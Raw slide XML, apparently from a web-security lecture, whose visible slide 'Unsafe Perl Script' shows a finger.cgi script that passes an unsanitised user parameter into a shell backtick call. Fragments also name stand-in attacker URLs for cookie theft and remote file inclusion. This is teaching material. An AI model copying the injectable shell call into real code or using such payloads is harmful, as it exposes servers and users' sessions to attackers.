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36949" y="1006855"/>
            <a:ext cx="298450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2505" y="2077465"/>
            <a:ext cx="8073389" cy="3995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325120" cy="243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acker.web.site/hack.txt?&amp;amp;cmd=l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hacker.web.site/cookie.cgi?%27%2B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603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45661" y="3830065"/>
            <a:ext cx="27660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Software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53400" y="6813042"/>
            <a:ext cx="1219200" cy="425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1059" y="1006855"/>
            <a:ext cx="32562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Unsafe Perl</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Script</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1998726" y="2130551"/>
            <a:ext cx="6769100" cy="269875"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6769100" h="269875">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="269748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6768846" y="269747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81200" y="2103276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0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17525" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1752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72586" y="2112269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81200" y="2103276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0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17525" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1752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72586" y="2112269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98726" y="2112264"/>
            <a:ext cx="6769100" cy="18415"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6769100" h="18414">
                <a:moveTo>
                  <a:pt x="0" y="18288"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6768846" y="18288"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6768846" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0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98725" y="2103276"/>
            <a:ext cx="6769100" cy="18415"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6769100" h="18414">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6768855" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="676885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67580" y="2103276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0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16766" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16766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67580" y="2103276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0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16766" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16766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81200" y="2130566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0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="269749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67581" y="2112269"/>
            <a:ext cx="0" cy="288290"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="288289">
                <a:moveTo>
                  <a:pt x="0" y="288047"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="172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98726" y="2400300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7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6768846" y="197357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81200" y="240030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767580" y="240030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98726" y="2597657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19">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="198120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6768846" y="198119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81200" y="2597668"/>
            <a:ext cx="0" cy="198120"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="198119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67580" y="2597668"/>
            <a:ext cx="0" cy="198120"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="198119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998726" y="2795777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7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6768846" y="197357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981200" y="2795786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767580" y="2795786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98726" y="2993135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19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981200" y="2993151"/>
            <a:ext cx="0" cy="198120"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="198119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767580" y="2993151"/>
            <a:ext cx="0" cy="198120"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="198119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998726" y="3191255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19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981200" y="3191269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67580" y="3191269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998726" y="3389376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981200" y="3389387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52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767580" y="3389387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52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998726" y="3586734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981200" y="358675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767580" y="358675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998726" y="3784853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981200" y="3784869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767580" y="3784869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998726" y="3982211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981200" y="39822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767580" y="39822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998726" y="4180332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981200" y="418035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767580" y="418035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998726" y="4378452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981200" y="4378470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67580" y="4378470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998726" y="4575809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981200" y="45758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767580" y="45758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998726" y="4773929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981200" y="477395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767580" y="477395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998726" y="4971288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981200" y="4971305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767580" y="4971305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998726" y="5169408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981200" y="51694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8767580" y="5169422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998726" y="5367528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981200" y="536755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7580" y="536755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65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998726" y="5564885"/>
            <a:ext cx="6769100" cy="198120"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6769100" h="198120">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="198120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6768846" y="198120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981200" y="5564905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767580" y="5564905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8117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998726" y="5763005"/>
            <a:ext cx="6769100" cy="197485"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6769100" h="197485">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="197358"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6768846" y="19735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981200" y="576302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52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767580" y="576302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0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="197352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998726" y="5960364"/>
            <a:ext cx="6769100" cy="269875"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6769100" h="269875">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="269748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6768846" y="269748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6768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9A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2084832" y="2171191"/>
            <a:ext cx="6110605" cy="40005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412750" indent="-309880">
              <a:lnSpc>
                <a:spcPts val="1620"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="114"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPlain"/>
              <a:tabLst>
                <a:tab pos="412115" algn="l"/>
                <a:tab pos="412750" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-35" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>#!/usr/bin/perl</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="102235" marR="5080" indent="635">
              <a:lnSpc>
                <a:spcPts val="1560"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="90"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPlain"/>
              <a:tabLst>
                <a:tab pos="412115" algn="l"/>
                <a:tab pos="412750" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-30" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>finger.cgi </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-25" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>finger </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-20" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>CGI </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-25" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>script using Perl5 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-20" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>CGI</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-43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module  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="412750" indent="-309880">
              <a:lnSpc>
                <a:spcPts val="1460"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPlain" startAt="4"/>
              <a:tabLst>
                <a:tab pos="412750" algn="l"/>
                <a:tab pos="413384" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-20" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>use</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-7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CGI;</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="412750" indent="-309880">
              <a:lnSpc>
                <a:spcPts val="1555"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPlain" startAt="4"/>
              <a:tabLst>
                <a:tab pos="412750" algn="l"/>
                <a:tab pos="413384" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-20" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>use </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-30" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>CGI::Carp</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10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qw(fatalsToBrowser);</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="102235" marR="1450975" indent="635">
              <a:lnSpc>
                <a:spcPts val="1560"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="90"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPlain" startAt="4"/>
              <a:tabLst>
                <a:tab pos="412750" algn="l"/>
                <a:tab pos="413384" algn="l"/>
                <a:tab pos="2479675" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-15" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$q </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-95" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-20" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>new</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-50" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-25" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>CGI;	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-25" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>create query</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-21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object  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="412115" indent="-309245">
              <a:lnSpc>
                <a:spcPts val="1465"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPlain" startAt="8"/>
              <a:tabLst>
                <a:tab pos="412115" algn="l"/>
                <a:tab pos="412750" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-25" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>display HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-18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header</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="412115" indent="-309245">
              <a:lnSpc>
                <a:spcPts val="1555"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPlain" startAt="8"/>
              <a:tabLst>
                <a:tab pos="412115" algn="l"/>
                <a:tab pos="412750" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-25" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>print</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-6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$q-&gt;header,</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1033144" indent="-1033144">
              <a:lnSpc>
                <a:spcPts val="1555"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPlain" startAt="8"/>
              <a:tabLst>
                <a:tab pos="1033144" algn="l"/>
                <a:tab pos="1033780" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-30" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$q-&gt;start_html('Finger</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-6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User'),</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1033144" indent="-1033144">
              <a:lnSpc>
                <a:spcPts val="1555"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPlain" startAt="8"/>
              <a:tabLst>
                <a:tab pos="1033144" algn="l"/>
                <a:tab pos="1033780" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-30" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$q-&gt;h1('Finger</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-7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User');</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="4242435">
              <a:lnSpc>
                <a:spcPts val="1560"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPlain" startAt="8"/>
              <a:tabLst>
                <a:tab pos="412750" algn="l"/>
                <a:tab pos="414020" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-25" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>print</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-114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"&lt;pre&gt;";  13</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="413384" indent="-413384">
              <a:lnSpc>
                <a:spcPts val="1460"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPlain" startAt="14"/>
              <a:tabLst>
                <a:tab pos="413384" algn="l"/>
                <a:tab pos="414020" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-20" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>get </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-25" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>name </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-15" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-25" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>user </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-20" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-25" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>display their finger</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-430" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-30" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>details</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="412750" indent="-412750">
              <a:lnSpc>
                <a:spcPts val="1555"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPlain" startAt="14"/>
              <a:tabLst>
                <a:tab pos="412750" algn="l"/>
                <a:tab pos="413384" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-25" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$user </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-11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$q-&gt;param("user");</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="2175510">
              <a:lnSpc>
                <a:spcPts val="1560"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="85"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPlain" startAt="14"/>
              <a:tabLst>
                <a:tab pos="413384" algn="l"/>
                <a:tab pos="414020" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-25" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>print </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-30" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>`/usr/bin/finger </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-20" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>-sh</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-165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$user`;  17</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="412750" indent="-412750">
              <a:lnSpc>
                <a:spcPts val="1465"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPlain" startAt="18"/>
              <a:tabLst>
                <a:tab pos="412750" algn="l"/>
                <a:tab pos="413384" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-25" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>display HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-18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footer</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="413384" indent="-413384">
              <a:lnSpc>
                <a:spcPts val="1555"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPlain" startAt="18"/>
              <a:tabLst>
                <a:tab pos="413384" algn="l"/>
                <a:tab pos="414020" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-25" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>print</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-7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"&lt;/pre&gt;";</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="412750" indent="-412750">
              <a:lnSpc>
                <a:spcPts val="1620"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPlain" startAt="18"/>
              <a:tabLst>
                <a:tab pos="412750" algn="l"/>
                <a:tab pos="413384" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-25" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>print</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-70" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-35" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$q-&gt;end_html;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981200" y="6221145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0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17525" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1752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972586" y="6230138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981200" y="6221145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0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17525" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1752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972586" y="6230138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80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998726" y="6230111"/>
            <a:ext cx="6769100" cy="18415"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6769100" h="18414">
                <a:moveTo>
                  <a:pt x="0" y="18286"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6768846" y="18286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6768846" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="18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998725" y="6221145"/>
            <a:ext cx="6769100" cy="18415"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6769100" h="18414">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6768855" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6768855" y="17985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="179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58966" y="6230138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79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758966" y="6230138"/>
            <a:ext cx="17780" cy="18415"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="17779" h="18414">
                <a:moveTo>
                  <a:pt x="0" y="18284"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17226" y="18284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17226" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="182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989963" y="2112264"/>
            <a:ext cx="0" cy="4136390"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="4136390">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="4136134"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="175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981200" y="5960388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0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="269749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775959" y="2112264"/>
            <a:ext cx="0" cy="4136390"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="4136390">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="4136134"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="167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67580" y="5960388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0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="269749"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="172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2174239" y="6239508"/>
            <a:ext cx="53447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26269A"/>
                </a:solidFill>
